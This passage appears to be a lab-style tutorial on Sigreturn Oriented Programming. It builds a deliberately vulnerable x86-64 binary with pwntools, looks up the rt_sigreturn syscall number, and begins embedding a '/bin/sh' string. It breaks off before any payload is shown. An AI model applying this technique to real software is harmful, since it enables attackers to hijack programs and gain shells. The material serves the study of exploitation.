SROP

Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. See [1] for details.

Vulnerable program

The vuln program:

```python
from pwn import *

context.arch = 'amd64'
context.os = 'linux'

# Deliberately minimal binary: rax is 0 at process entry on Linux, so the
# first syscall is read(0, rsp-8, 500), which overflows the stack.
# The trailing "pop rax; ret" is a gadget for setting rax later.
elf = ELF.from_assembly(
    '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx, 500;
    syscall;
    ret;
    pop rax;
    ret;
    ''',
    vma=0x41000
)
elf.save('vuln')
```

Syscall number of rt_sigreturn:

```
└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
```

Embed the shell string:

```
┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln
┌──(k……
```
